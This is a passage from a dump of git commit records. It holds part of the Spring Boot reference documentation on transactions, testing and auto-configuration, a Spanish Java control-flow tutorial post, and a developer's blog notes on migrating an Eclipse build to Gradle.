To ensure\nuniqueness in production, you should configure the `spring.jta.transaction-manager-id`\nproperty with a different value for each instance of your application.\n\n\n\n=== Using a Bitronix transaction manager\nBitronix is another popular open source JTA transaction manager implementation. You can\nuse the `spring-boot-starter-jta-bitronix` starter POM to add the appropriate Bitronix\ndependencies to your project. As with Atomikos, Spring Boot will automatically configure\nBitronix and post-process your beans to ensure that startup and shutdown ordering is\ncorrect.\n\nBy default Bitronix transaction log files (`part1.btm` and `part2.btm`) will be written to\na `transaction-logs` directory in your application home directory. You can customize this\ndirectory by using the `spring.jta.log-dir` property. Properties starting `spring.jta.`\nare also bound to the `bitronix.tm.Configuration` bean, allowing for complete\ncustomization. See the\nhttps:\/\/github.com\/bitronix\/btm\/wiki\/Transaction-manager-configuration[Bitronix documentation]\nfor details.\n\nNOTE: To ensure that multiple transaction managers can safely coordinate the same\nresource managers, each Bitronix instance must be configured with a unique ID. By default\nthis ID is the IP address of the machine on which Bitronix is running. To ensure\nuniqueness in production, you should configure the `spring.jta.transaction-manager-id`\nproperty with a different value for each instance of your application.\n\n\n\n=== Using a Java EE managed transaction manager\nIf you are packaging your Spring Boot application as a `war` or `ear` file and deploying\nit to a Java EE application server, you can use your application servers built-in\ntransaction manager. Spring Boot will attempt to auto-configure a transaction manager by\nlooking at common JNDI locations (`java:comp\/UserTransaction`,\n`java:comp\/TransactionManager` etc). If you are using a transaction service provided by\nyour application server, you will generally also want to ensure that all resources are\nmanaged by the server and exposed over JNDI. Spring Boot will attempt to auto-configure\nJMS by looking for a `ConnectionFactory` at the JNDI path `java:\/JmsXA` or\n`java:\/XAConnectionFactory` and you can use the\n<<boot-features-connecting-to-a-jndi-datasource, `spring.datasource.jndi-name` property>>\nto configure your `DataSource`.\n\n\n\n=== Mixing XA and non-XA JMS connections\nWhen using JTA, the primary JMS `ConnectionFactory` bean will be XA aware and participate\nin distributed transactions. In some situations you might want to process certain JMS\nmessages using a non-XA `ConnectionFactory`. 
For example, your JMS processing logic might\ntake longer than the XA timeout.\n\nIf you want to use a non-XA `ConnectionFactory` you can inject the\n`nonXaJmsConnectionFactory` bean rather than the `@Primary` `jmsConnectionFactory` bean.\nFor consistency the `jmsConnectionFactory` bean is also provided using the bean alias\n`xaJmsConnectionFactory`.\n\nFor example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t\/\/ Inject the primary (XA aware) ConnectionFactory\n\t@Autowired\n\tprivate ConnectionFactory defaultConnectionFactory;\n\n\t\/\/ Inject the XA aware ConnectionFactory (uses the alias and injects the same as above)\n\t@Autowired\n\t@Qualifier(\"xaJmsConnectionFactory\")\n\tprivate ConnectionFactory xaConnectionFactory;\n\n\t\/\/ Inject the non-XA aware ConnectionFactory\n\t@Autowired\n\t@Qualifier(\"nonXaJmsConnectionFactory\")\n\tprivate ConnectionFactory nonXaConnectionFactory;\n----\n\n\n\n=== Supporting an alternative embedded transaction manager\nThe {sc-spring-boot}\/jta\/XAConnectionFactoryWrapper.{sc-ext}[`XAConnectionFactoryWrapper`]\nand {sc-spring-boot}\/jta\/XADataSourceWrapper.{sc-ext}[`XADataSourceWrapper`] interfaces\ncan be used to support alternative embedded transaction managers. The interfaces are\nresponsible for wrapping `XAConnectionFactory` and `XADataSource` beans and exposing them\nas regular `ConnectionFactory` and `DataSource` beans which will transparently enroll in\nthe distributed transaction. DataSource and JMS auto-configuration will use JTA variants\nas long as you have a `JtaTransactionManager` bean and appropriate XA wrapper beans\nregistered within your `ApplicationContext`.\n\nThe {sc-spring-boot}\/jta\/BitronixXAConnectionFactoryWrapper.{sc-ext}[BitronixXAConnectionFactoryWrapper]\nand {sc-spring-boot}\/jta\/BitronixXADataSourceWrapper.{sc-ext}[BitronixXADataSourceWrapper]\nprovide good examples of how to write XA wrappers.\n\n\n\n[[boot-features-hazelcast]]\n== Hazelcast\n\nIf hazelcast is on the classpath, Spring Boot will auto-configure an `HazelcastInstance`\nthat you can inject in your application. The `HazelcastInstance` is only created if a\nconfiguration is found.\n\nYou can define a `com.hazelcast.config.Config` bean and we'll use that. If your\nconfiguration defines an instance name, we'll try to locate an existing instance rather\nthan creating a new one.\n\nYou could also specify the `hazelcast.xml` configuration file to use via configuration:\n\n[source,properties,indent=0]\n----\n\tspring.hazelcast.config=classpath:config\/my-hazelcast.xml\n----\n\nOtherwise, Spring Boot tries to find the Hazelcast configuration from the default\nlocations, that is `hazelcast.xml` in the working directory or at the root of the\nclasspath. We also check if the `hazelcast.config` system property is set. Check the\nhttp:\/\/docs.hazelcast.org\/docs\/latest\/manual\/html-single\/[Hazelcast documentation] for\nmore details.\n\nNOTE: Spring Boot also has an\n<<boot-features-caching-provider-hazelcast,explicit caching support for Hazelcast>>. The\n`HazelcastInstance` is automatically wrapped in a `CacheManager` implementation if\ncaching is enabled.\n\n\n\n[[boot-features-integration]]\n== Spring Integration\nSpring Integration provides abstractions over messaging and also other transports such as\nHTTP, TCP etc. If Spring Integration is available on your classpath it will be initialized\nthrough the `@EnableIntegration` annotation. 
Message processing statistics will be\npublished over JMX if `'spring-integration-jmx'` is also on the classpath. See the\n{sc-spring-boot-autoconfigure}\/integration\/IntegrationAutoConfiguration.{sc-ext}[`IntegrationAutoConfiguration`]\nclass for more details.\n\n\n\n[[boot-features-session]]\n== Spring Session\nSpring Session provides support for managing a user's session information. If you are\nwriting a web application and Spring Session and Spring Data Redis are both on the\nclasspath, Spring Boot will auto-configure Spring Session through its\n`@EnableRedisHttpSession`. Session data will be stored in Redis and the session timeout\ncan be configured using the `server.session-timeout` property.\n\n\n\n[[boot-features-jmx]]\n== Monitoring and management over JMX\nJava Management Extensions (JMX) provide a standard mechanism to monitor and manage\napplications. By default Spring Boot will create an `MBeanServer` with bean id\n'`mbeanServer`' and expose any of your beans that are annotated with Spring JMX\nannotations (`@ManagedResource`, `@ManagedAttribute`, `@ManagedOperation`).\n\nSee the\n{sc-spring-boot-autoconfigure}\/jmx\/JmxAutoConfiguration.{sc-ext}[`JmxAutoConfiguration`]\nclass for more details.\n\n\n\n[[boot-features-testing]]\n== Testing\nSpring Boot provides a number of useful tools for testing your application. The\n`spring-boot-starter-test` POM provides Spring Test, JUnit, Hamcrest and Mockito\ndependencies. There are also useful test utilities in the core `spring-boot` module under\nthe `org.springframework.boot.test` package.\n\n\n\n[[boot-features-test-scope-dependencies]]\n=== Test scope dependencies\nIf you use the\n`spring-boot-starter-test` '`Starter POM`' (in the `test` `scope`), you will find\nthe following provided libraries:\n\n* Spring Test -- integration test support for Spring applications.\n* JUnit -- The de-facto standard for unit testing Java applications.\n* Hamcrest -- A library of matcher objects (also known as constraints or predicates)\n allowing `assertThat` style JUnit assertions.\n* Mockito -- A Java mocking framework.\n\nThese are common libraries that we generally find useful when writing tests. You are free\nto add additional test dependencies of your own if these don't suit your needs.\n\n\n[[boot-features-testing-spring-applications]]\n=== Testing Spring applications\nOne of the major advantages of dependency injection is that it should make your code\neasier to unit test. You can simply instantiate objects using the `new` operator without\neven involving Spring. You can also use _mock objects_ instead of real dependencies.\n\nOften you need to move beyond '`unit testing`' and start '`integration testing`' (with\na Spring `ApplicationContext` actually involved in the process). 
It's useful to be able\nto perform integration testing without requiring deployment of your application or\nneeding to connect to other infrastructure.\n\nThe Spring Framework includes a dedicated test module for just such integration testing.\nYou can declare a dependency directly to `org.springframework:spring-test` or use the\n`spring-boot-starter-test` '`Starter POM`' to pull it in transitively.\n\nIf you have not used the `spring-test` module before you should start by reading the\n{spring-reference}\/#testing[relevant section] of the Spring Framework reference\ndocumentation.\n\n\n\n[[boot-features-testing-spring-boot-applications]]\n=== Testing Spring Boot applications\nA Spring Boot application is just a Spring `ApplicationContext` so nothing very special\nhas to be done to test it beyond what you would normally do with a vanilla Spring context.\nOne thing to watch out for though is that the external properties, logging and other\nfeatures of Spring Boot are only installed in the context by default if you use\n`SpringApplication` to create it.\n\nSpring Boot provides a `@SpringApplicationConfiguration` annotation as an alternative\nto the standard `spring-test` `@ContextConfiguration` annotation. If you use\n`@SpringApplicationConfiguration` to configure the `ApplicationContext` used in your\ntests, it will be created via `SpringApplication` and you will get the additional Spring\nBoot features.\n\nFor example:\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RunWith(SpringJUnit4ClassRunner.class)\n\t@SpringApplicationConfiguration(SampleDataJpaApplication.class)\n\tpublic class CityRepositoryIntegrationTests {\n\n\t\t@Autowired\n\t\tCityRepository repository;\n\n\t\t\/\/ ...\n\n\t}\n----\n\nTIP: The context loader guesses whether you want to test a web application or not (e.g.\nwith `MockMVC`) by looking for the `@WebIntegrationTest` or `@WebAppConfiguration`\nannotations. (`MockMVC` and `@WebAppConfiguration` are part of `spring-test`).\n\nIf you want a web application to start up and listen on its normal port, so you can test\nit with HTTP (e.g. using `RestTemplate`), annotate your test class (or one of its\nsuperclasses) with `@WebIntegrationTest`. This can be very useful because it means you can\ntest the full stack of your application, but also inject its components into the test\nclass and use them to assert the internal state of the application after an HTTP\ninteraction. For example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RunWith(SpringJUnit4ClassRunner.class)\n\t@SpringApplicationConfiguration(SampleDataJpaApplication.class)\n\t@WebIntegrationTest\n\tpublic class CityRepositoryIntegrationTests {\n\n\t\t@Autowired\n\t\tCityRepository repository;\n\n\t\tRestTemplate restTemplate = new TestRestTemplate();\n\n\t\t\/\/ ... interact with the running server\n\n\t}\n----\n\nNOTE: Spring's test framework will cache application contexts between tests. Therefore,\nas long as your tests share the same configuration, the time consuming process of starting\nand stopping the server will only happen once, regardless of the number of tests that\nactually run.\n\nTo change the port you can add environment properties to `@WebIntegrationTest` as colon-\nor equals-separated name-value pairs, e.g. `@WebIntegrationTest(\"server.port:9000\")`.\nAdditionally you can set the `server.port` and `management.port` properties to `0`\nin order to run your integration tests using random ports. 
For example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RunWith(SpringJUnit4ClassRunner.class)\n\t@SpringApplicationConfiguration(MyApplication.class)\n\t@WebIntegrationTest({\"server.port=0\", \"management.port=0\"})\n\tpublic class SomeIntegrationTests {\n\n\t\t\/\/ ...\n\n\t}\n----\n\nSee <<howto-discover-the-http-port-at-runtime>> for a description of how you can discover\nthe actual port that was allocated for the duration of the tests.\n\n\n\n[[boot-features-testing-spring-boot-applications-with-spock]]\n==== Using Spock to test Spring Boot applications\nIf you wish to use Spock to test a Spring Boot application you should add a dependency\non Spock's `spock-spring` module to your application's build. `spock-spring` integrates\nSpring's test framework into Spock.\n\nNOTE: The annotations <<boot-features-testing-spring-boot-applications,described above>>\ncan be used with Spock, i.e. you can annotate your `Specification` with\n`@WebIntegrationTest` to suit the needs of your tests.\n\n\n\n[[boot-features-test-utilities]]\n=== Test utilities\nA few test utility classes are packaged as part of `spring-boot` that are generally\nuseful when testing your application.\n\n\n\n[[boot-features-configfileapplicationcontextinitializer-test-utility]]\n==== ConfigFileApplicationContextInitializer\n`ConfigFileApplicationContextInitializer` is an `ApplicationContextInitializer` that\ncan apply to your tests to load Spring Boot `application.properties` files. You can use\nthis when you don't need the full features provided by `@SpringApplicationConfiguration`.\n\n[source,java,indent=0]\n----\n\t@ContextConfiguration(classes = Config.class,\n\t\tinitializers = ConfigFileApplicationContextInitializer.class)\n----\n\n\n\n[[boot-features-environment-test-utilities]]\n==== EnvironmentTestUtils\n`EnvironmentTestUtils` allows you to quickly add properties to a\n`ConfigurableEnvironment` or `ConfigurableApplicationContext`. Simply call it with\n`key=value` strings:\n\n[source,java,indent=0]\n----\nEnvironmentTestUtils.addEnvironment(env, \"org=Spring\", \"name=Boot\");\n----\n\n\n\n[[boot-features-output-capture-test-utility]]\n==== OutputCapture\n`OutputCapture` is a JUnit `Rule` that you can use to capture `System.out` and\n`System.err` output. Simply declare the capture as a `@Rule` then use `toString()`\nfor assertions:\n\n[source,java,indent=0]\n----\nimport org.junit.Rule;\nimport org.junit.Test;\nimport org.springframework.boot.test.OutputCapture;\n\nimport static org.hamcrest.Matchers.*;\nimport static org.junit.Assert.*;\n\npublic class MyTest {\n\n\t@Rule\n\tpublic OutputCapture capture = new OutputCapture();\n\n\t@Test\n\tpublic void testName() throws Exception {\n\t\tSystem.out.println(\"Hello World!\");\n\t\tassertThat(capture.toString(), containsString(\"World\"));\n\t}\n\n}\n----\n\n[[boot-features-rest-templates-test-utility]]\n==== TestRestTemplate\n\n`TestRestTemplate` is a convenience subclass of Spring's `RestTemplate` that is useful in\nintegration tests. You can get a vanilla template or one that sends Basic HTTP\nauthentication (with a username and password). In either case the template will behave\nin a test-friendly way: not following redirects (so you can assert the response location),\nignoring cookies (so the template is stateless), and not throwing exceptions on\nserver-side errors. 
It is recommended, but not mandatory, to use Apache HTTP Client\n(version 4.3.2 or better), and if you have that on your classpath the `TestRestTemplate`\nwill respond by configuring the client appropriately.\n\n[source,java,indent=0]\n----\npublic class MyTest {\n\n\tRestTemplate template = new TestRestTemplate();\n\n\t@Test\n\tpublic void testRequest() throws Exception {\n\t\tHttpHeaders headers = template.getForEntity(\"http:\/\/myhost.com\", String.class).getHeaders();\n\t\tassertThat(headers.getLocation().toString(), containsString(\"myotherhost\"));\n\t}\n\n}\n----\n\n\n\n[[boot-features-developing-auto-configuration]]\n== Creating your own auto-configuration\nIf you work in a company that develops shared libraries, or if you work on an open-source\nor commercial library, you might want to develop your own auto-configuration.\nAuto-configuration classes can be bundled in external jars and still be picked-up by\nSpring Boot.\n\nAuto-configuration can be associated to a \"starter\" that provides the auto-configuration\ncode as well as the typical libraries that you would use with it. We will first cover what\nyou need to know to build your own auto-configuration and we will move on to the\n<<boot-features-custom-starter,typical steps required to create a custom starter>>.\n\nTIP: A https:\/\/github.com\/snicoll-demos\/spring-boot-master-auto-configuration[demo project]\nis available to showcase how you can create a starter step by step.\n\n\n\n[[boot-features-understanding-auto-configured-beans]]\n=== Understanding auto-configured beans\nUnder the hood, auto-configuration is implemented with standard `@Configuration` classes.\nAdditional `@Conditional` annotations are used to constrain when the auto-configuration\nshould apply. Usually auto-configuration classes use `@ConditionalOnClass` and\n`@ConditionalOnMissingBean` annotations. This ensures that auto-configuration only applies\nwhen relevant classes are found and when you have not declared your own `@Configuration`.\n\nYou can browse the source code of `spring-boot-autoconfigure` to see the `@Configuration`\nclasses that we provide (see the `META-INF\/spring.factories` file).\n\n\n\n[[boot-features-locating-auto-configuration-candidates]]\n=== Locating auto-configuration candidates\nSpring Boot checks for the presence of a `META-INF\/spring.factories` file within your\npublished jar. The file should list your configuration classes under the\n`EnableAutoConfiguration` key.\n\n[indent=0]\n----\n\torg.springframework.boot.autoconfigure.EnableAutoConfiguration=\\\n\tcom.mycorp.libx.autoconfigure.LibXAutoConfiguration,\\\n\tcom.mycorp.libx.autoconfigure.LibXWebAutoConfiguration\n----\n\nYou can use the\n{sc-spring-boot-autoconfigure}\/AutoConfigureAfter.{sc-ext}[`@AutoConfigureAfter`] or\n{sc-spring-boot-autoconfigure}\/AutoConfigureBefore.{sc-ext}[`@AutoConfigureBefore`]\nannotations if your configuration needs to be applied in a specific order. For example, if\nyou provide web-specific configuration, your class may need to be applied after\n`WebMvcAutoConfiguration`.\n\n\n\n[[boot-features-condition-annotations]]\n=== Condition annotations\nYou almost always want to include one or more `@Conditional` annotations on your\nauto-configuration class. 
The `@ConditionalOnMissingBean` is one common example that is\nused to allow developers to '`override`' auto-configuration if they are not happy with\nyour defaults.\n\nSpring Boot includes a number of `@Conditional` annotations that you can reuse in your own\ncode by annotating `@Configuration` classes or individual `@Bean` methods.\n\n\n\n[[boot-features-class-conditions]]\n==== Class conditions\nThe `@ConditionalOnClass` and `@ConditionalOnMissingClass` annotations allows\nconfiguration to be included based on the presence or absence of specific classes. Due to\nthe fact that annotation metadata is parsed using http:\/\/asm.ow2.org\/[ASM] you can\nactually use the `value` attribute to refer to the real class, even though that class\nmight not actually appear on the running application classpath. You can also use the\n`name` attribute if you prefer to specify the class name using a `String` value.\n\n\n\n[[boot-features-bean-conditions]]\n==== Bean conditions\nThe `@ConditionalOnBean` and `@ConditionalOnMissingBean` annotations allow a bean\nto be included based on the presence or absence of specific beans. You can use the `value`\nattribute to specify beans by type, or `name` to specify beans by name. The `search`\nattribute allows you to limit the `ApplicationContext` hierarchy that should be considered\nwhen searching for beans.\n\nConditions are evaluated after all configuration classes have been processed. This clearly\nmeans that you can't use it to make a whole configuration class conditional on the presence\n(or absence) of another bean. You can, however, use it when you have to share that\ncondition with all the beans of that configuration class.\n\n[NOTE]\n====\nYou also need to be very careful about ordering as the condition will be evaluated based on\nthe bean definitions that have been processed so far. Auto-configured `@Configuration` is\nalways parsed last (after any user defined beans) so it is recommended to restrict the use\nof that condition on auto-configuration classes only. However, if you are sure that the bean\ntargeted at the condition won't be created by auto-configuration, then you could use it on a\nnormal configuration class with appropriate ordering.\n====\n\n\n\n[[boot-features-property-conditions]]\n==== Property conditions\nThe `@ConditionalOnProperty` annotation allows configuration to be included based on a\nSpring Environment property. Use the `prefix` and `name` attributes to specify the\nproperty that should be checked. By default any property that exists and is not equal to\n`false` will be matched. You can also create more advanced checks using the `havingValue`\nand `matchIfMissing` attributes.\n\n\n\n[[boot-features-resource-conditions]]\n==== Resource conditions\nThe `@ConditionalOnResource` annotation allows configuration to be included only when a\nspecific resource is present. Resources can be specified using the usual Spring\nconventions, for example, `file:\/home\/user\/test.dat`.\n\n\n\n[[boot-features-web-application-conditions]]\n==== Web application conditions\nThe `@ConditionalOnWebApplication` and `@ConditionalOnNotWebApplication` annotations\nallow configuration to be included depending on whether the application is a 'web\napplication'. 
A web application is any application that is using a Spring\n`WebApplicationContext`, defines a `session` scope or has a `StandardServletEnvironment`.\n\n\n\n[[boot-features-spel-conditions]]\n==== SpEL expression conditions\nThe `@ConditionalOnExpression` annotation allows configuration to be included based on the\nresult of a {spring-reference}\/#expressions[SpEL expression].\n\n\n\n[[boot-features-custom-starter]]\n=== Creating your own starter\nA full Spring Boot starter for a library may contain the following components:\n\n* The `autoconfigure` module that contains the auto-configuration code.\n* The `starter` module that provides a dependency to the autoconfigure module as well as\n the library and any additional dependencies that are typically useful. In a nutshell,\n adding the starter should be enough to start using that library.\n\nTIP: You may combine the auto-configuration code and the dependency management in a single\nmodule if you don't need to separate those two concerns.\n\n\n\n[[boot-features-custom-starter-naming]]\n==== Naming\nPlease make sure to provide a proper namespace for your starter. Do not start your module\nnames with `spring-boot`, even if you are using a different Maven groupId. We may offer an\nofficial support for the thing you're auto-configuring in the future.\n\nHere is a rule of thumb. Let's assume that you are creating a starter for \"acme\", name the\nauto-configure module `acme-spring-boot-autoconfigure` and the starter\n`acme-spring-boot-starter`. If you only have one module combining the two, use\n`acme-spring-boot-starter`.\n\nBesides, if your starter provides configuration keys, use a proper namespace for them. In\nparticular, do not include your keys in the namespaces that Spring Boot uses (e.g.\n`server`, `management`, `spring`, etc). These are \"ours\" and we may improve\/modify them\nin the future in such a way it could break your things.\n\nMake sure to\n<<appendix-configuration-metadata#configuration-metadata-annotation-processor,trigger\nmeta-data generation>> so that IDE assistance is available for your keys as well. You\nmay want to review the generated meta-data (`META-INF\/spring-configuration-metadata.json`)\nto make sure your keys are properly documented.\n\n\n\n[[boot-features-custom-starter-module-autoconfigure]]\n==== Autoconfigure module\nThe autoconfigure module contains everything that is necessary to get started with the\nlibrary. It may also contain configuration keys definition (`@ConfigurationProperties`)\nand any callback interface that can be used to further customize how the components are\ninitialized.\n\nTIP: You should mark the dependencies to the library as optional so that you can include\nthe autoconfigure module in your projects more easily. If you do it that way, the library\nwon't be provided and Spring Boot will backoff by default.\n\n\n\n[[boot-features-custom-starter-module-starter]]\n==== Starter module\nThe starter is an empty jar, really. Its only purpose is to provide the necessary\ndependencies to work with the library; see it as an opinionated view of what is required\nto get started.\n\nDo not make assumptions about the project in which your starter is added. If the library\nyou are auto-configuring typically requires other starters, mention them as well. 
Providing\na proper set of _default_ dependencies may be hard if the number of optional dependencies\nis high as you should avoid bringing unnecessary dependencies for a typical usage of the\nlibrary.\n\n\n\n[[boot-features-websockets]]\n== WebSockets\nSpring Boot provides WebSockets auto-configuration for embedded Tomcat (8 and 7), Jetty 9\nand Undertow. If you're deploying a war file to a standalone container, Spring Boot\nassumes that the container will be responsible for the configuration of its WebSocket\nsupport.\n\nSpring Framework provides {spring-reference}\/#websocket[rich WebSocket support] that can\nbe easily accessed via the `spring-boot-starter-websocket` module.\n\n\n\n[[boot-features-whats-next]]\n== What to read next\nIf you want to learn more about any of the classes discussed in this section you can\ncheck out the {dc-root}[Spring Boot API documentation] or you can browse the\n{github-code}[source code directly]. If you have specific questions, take a look at the\n<<howto.aoc#howto, how-to>> section.\n\nIf you are comfortable with Spring Boot's core features, you can carry on and read\nabout <<production-ready-features.adoc#production-ready, production-ready features>>.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b454261da307f565432900e391ee6bc311a83183","subject":"Update 2015-05-07-Estructuras-de-Control-If-Else-While.adoc","message":"Update 2015-05-07-Estructuras-de-Control-If-Else-While.adoc","repos":"Wurser\/wurser.github.io,Wurser\/wurser.github.io,Wurser\/wurser.github.io","old_file":"_posts\/2015-05-07-Estructuras-de-Control-If-Else-While.adoc","new_file":"_posts\/2015-05-07-Estructuras-de-Control-If-Else-While.adoc","new_contents":"= Estructuras de Control. If, Else, While.\n\n:hp-tags: Simplemente Java, Java\n\n== If\n\t\t\n\n\tif(Condicion_Booleana){ \n \t\/\/C\u00f3digo que se ejecurtar\u00e1 si se cumple la condici\u00f3n\n }\n \n \n== Else\n\n\n\t\n if(Condicion_Booleana){ \n \t\/\/C\u00f3digo que se ejecurtar\u00e1 si se cumple la condici\u00f3n\n }else{\n \t\/\/C\u00f3digo que se ejecurtar\u00e1 si NO se cumple la condici\u00f3n\n }\n \n \n== Else If\n\n\n\n if(#1_Condicion_Booleana){ \n\t \/\/C\u00f3digo que se ejecurtar\u00e1 si se cumple la condici\u00f3n\n }else if(#2_Condicion_Booleana){\n\t \/\/C\u00f3digo que se ejecurtar\u00e1 si NO se cumple la condici\u00f3n #1 y si la condici\u00f3n #2\n }\n \n \nTambien se puede poner un `*_else_*` al final \n \n if(#1_Condicion_Booleana){ \n \t\/\/C\u00f3digo que se ejecurtar\u00e1 si se cumple la condici\u00f3n\n }else if(#2_Condicion_Booleana){\n \t\/\/C\u00f3digo que se ejecurtar\u00e1 si NO se cumple la condici\u00f3n #1 y si la condici\u00f3n #2\n }else{\n\t \/\/C\u00f3digo que se ejecurtar\u00e1 si NO se cumple ninguna de las condiciones\n }\n \n \n\n== While\n\n\twhile(CONDICION_BOOLEANA){\n\t\t\/\/C\u00f3digo que se ejecurtar\u00e1 mientras se cumpla la condici\u00f3n\n\t}\n \n \nCAUTION: Si la condicion no se cumple, no entra en el bucle while ","old_contents":"= Estructuras de Control. 
If, Else, While.\n\n:hp-tags: Simplemente Java, Java\n\n== IF\n\t\t\n\n\tif(Condicion_Booleana){ \n \t\/\/C\u00f3digo que se ejecurtar\u00e1 si se cumple la condici\u00f3n\n }\n \n \n== ELSE\n\n\n\t\n if(Condicion_Booleana){ \n \t\/\/C\u00f3digo que se ejecurtar\u00e1 si se cumple la condici\u00f3n\n }else{\n \t\/\/C\u00f3digo que se ejecurtar\u00e1 si NO se cumple la condici\u00f3n\n }\n \n \n== ELSE IF\n\n\n\n if(#1_Condicion_Booleana){ \n\t \/\/C\u00f3digo que se ejecurtar\u00e1 si se cumple la condici\u00f3n\n }else if(#2_Condicion_Booleana){\n\t \/\/C\u00f3digo que se ejecurtar\u00e1 si NO se cumple la condici\u00f3n #1 y si la condici\u00f3n #2\n }\n \n \nTambien se puede poner un `*_else_*` al final \n \n if(#1_Condicion_Booleana){ \n \t\/\/C\u00f3digo que se ejecurtar\u00e1 si se cumple la condici\u00f3n\n }else if(#2_Condicion_Booleana){\n \t\/\/C\u00f3digo que se ejecurtar\u00e1 si NO se cumple la condici\u00f3n #1 y si la condici\u00f3n #2\n }else{\n\t \/\/C\u00f3digo que se ejecurtar\u00e1 si NO se cumple ninguna de las condiciones\n }\n \n \n\n== WHILE\n\n\twhile(CONDICION_BOOLEANA){\n\t\t\/\/C\u00f3digo que se ejecurtar\u00e1 mientras se cumpla la condici\u00f3n\n\t}\n \n \nCAUTION: Si la condicion no se cumple, no entra en el bucle while ","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"4fa26de36d430057516fa6ca21cf85ab28c0df44","subject":"Update 2017-11-21-Building-op-appear-with-using-Gradle.adoc","message":"Update 2017-11-21-Building-op-appear-with-using-Gradle.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-11-21-Building-op-appear-with-using-Gradle.adoc","new_file":"_posts\/2017-11-21-Building-op-appear-with-using-Gradle.adoc","new_contents":"= Building op-app.ear with using Gradle\n\nMy newest assignment is to figure out how to build OpenPages using Gradle for the purpose of integrating added applications to it.\n\ntodo: make a graph of the applications we have today and show how the gradle build is going to work\n\n*Inception*\n\nWhen this suggested to me, I wasn't thrilled about it. But as I considered it closely, this is an opportunity to remove OpenPages from Eclipse once and for all. The problem here is that Eclipse is the tool we use to create the build artifacts, and as such is tightly intertwined with our build and release processes. Making any change to the project structure has implications that would create too much risk. \n\nBeing in Eclipse, there is no tooling that creates a visualization of the workspace's dependency structure, and so you are forced to investigate manually. Using Gradle or Maven, such visualizations are available, and these are much easier to follow and understand. And, best of all, these can be easily extended for purposes such as my current task.\n\nI started doing some of this manually. Here to the best of my recollection are the steps I've followed so far:\n\n- Created an IntelliJ Gradle project in ~\/projects\/ibm\/op-7.4-idea\n- Opened Eclipse to the current OpenPages 7.4 project that was already on my system\n- Now I found the rootmost project in the Eclipse workspace, which appears to be called *modelobjects*. \n- tbd\n\nThe idea is, look into an api that gives insight on an Eclipse workspace that can be read and translated into something else, in my case Gradle. 
The process of doing it manually is cumbersome, and the process will need to be repeated for every build, as projects are updated constantly. So the workflow will look like this:\n\n1) Gradle script uses RTC command line to pull the latest code\n2) Gradle script builds the application, perhaps with addons specified\n3) Out pops op-apps.ear\n\n- So, investigating an API to provide Eclipse introspection, and failing that or maybe instead of that, read the eclipse project files in code I've written based upon what I'm seeing in the OpenPages project in Eclipse.\n- Investigating RTC command line\n\n**Man, this might be easy**\n\nSo as I look at the .classpath of each project, its a simple XML structure. Here's an example for the project *aurora*:\n\n```<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<classpath>\n\t<classpathentry kind=\"src\" path=\"com.ibm.openpages.aurora.service\"\/>\n\t<classpathentry kind=\"src\" path=\"com.ibm.openpages.webapp\"\/>\n\t<classpathentry kind=\"src\" path=\"com.openpages.aurora\"\/>\n\t<classpathentry kind=\"src\" path=\"com.ibm.openpages.sdk\"\/>\n\t<classpathentry combineaccessrules=\"false\" exported=\"true\" kind=\"src\" path=\"\/com.ibm.openpages.libraries\"\/>\n\t<classpathentry exported=\"true\" kind=\"lib\" path=\"\/com.ibm.openpages.libraries\/op-apps.ear\/lib\/java-sdk-3.8.0-jar-with-dependencies.jar\"\/>\n\t<classpathentry combineaccessrules=\"false\" exported=\"true\" kind=\"src\" path=\"\/com.ibm.openpages.modelobjects\"\/>\n\t<classpathentry kind=\"con\" path=\"org.eclipse.jdt.launching.JRE_CONTAINER\"\/>\n\t<classpathentry combineaccessrules=\"false\" exported=\"true\" kind=\"src\" path=\"\/com.ibm.openpages.aurora.tools\"\/>\n\t<classpathentry kind=\"con\" path=\"org.eclipse.jst.j2ee.internal.module.container\"\/>\n\t<classpathentry combineaccessrules=\"false\" exported=\"true\" kind=\"src\" path=\"\/com.ibm.openpages.aurora.parsers\"\/>\n\t<classpathentry combineaccessrules=\"false\" kind=\"src\" path=\"\/com.ibm.openpages.reporting.webservice\"\/>\n\t<classpathentry kind=\"output\" path=\"bin\"\/>\n<\/classpath>\n```\n\n","old_contents":"= Building op-app.ear with using Gradle\n\nMy newest assignment is to figure out how to build OpenPages using Gradle for the purpose of integrating added applications to it.\n\ntodo: make a graph of the applications we have today and show how the gradle build is going to work\n\n*Inception*\n\nWhen this suggested to me, I wasn't thrilled about it. But as I considered it closely, this is an opportunity to remove OpenPages from Eclipse once and for all. The problem here is that Eclipse is the tool we use to create the build artifacts, and as such is tightly intertwined with our build and release processes. Making any change to the project structure has implications that would create too much risk. \n\nBeing in Eclipse, there is no tooling that creates a visualization of the workspace's dependency structure, and so you are forced to investigate manually. Using Gradle or Maven, such visualizations are available, and these are much easier to follow and understand. And, best of all, these can be easily extended for purposes such as my current task.\n\nI started doing some of this manually. 
Here to the best of my recollection are the steps I've followed so far:\n\n- Created an IntelliJ Gradle project in ~\/projects\/ibm\/op-7.4-idea\n- Opened Eclipse to the current OpenPages 7.4 project that was already on my system\n- Now I found the rootmost project in the Eclipse workspace, which appears to be called *modelobjects*. \n- tbd\n\nThe idea is, look into an api that gives insight on an Eclipse workspace that can be read and translated into something else, in my case Gradle. The process of doing it manually is cumbersome, and the process will need to be repeated for every build, as projects are updated constantly. So the workflow will look like this:\n\n1) Gradle script uses RTC command line to pull the latest code\n2) Gradle script builds the application, perhaps with addons specified\n3) Out pops op-apps.ear\n\n- So, investigating an API to provide Eclipse introspection, and failing that or maybe instead of that, read the eclipse project files in code I've written based upon what I'm seeing in the OpenPages project in Eclipse.\n- Investigating RTC command line\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"4029818c242bb5f42f14dde4985b44909a760da9","subject":"[Docs]\u00a0Correct formatting in datehistogram-aggregation.asciidoc (#56664)","message":"[Docs]\u00a0Correct formatting in 